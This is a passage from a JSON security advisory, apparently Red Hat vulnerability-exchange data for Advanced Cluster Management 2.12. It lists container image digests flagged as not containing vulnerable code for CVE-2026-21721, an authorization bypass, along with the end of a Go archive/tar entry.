"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map"
},
{
"cve": "CVE-2026-21721",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2026-01-27T10:02:34.317952+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
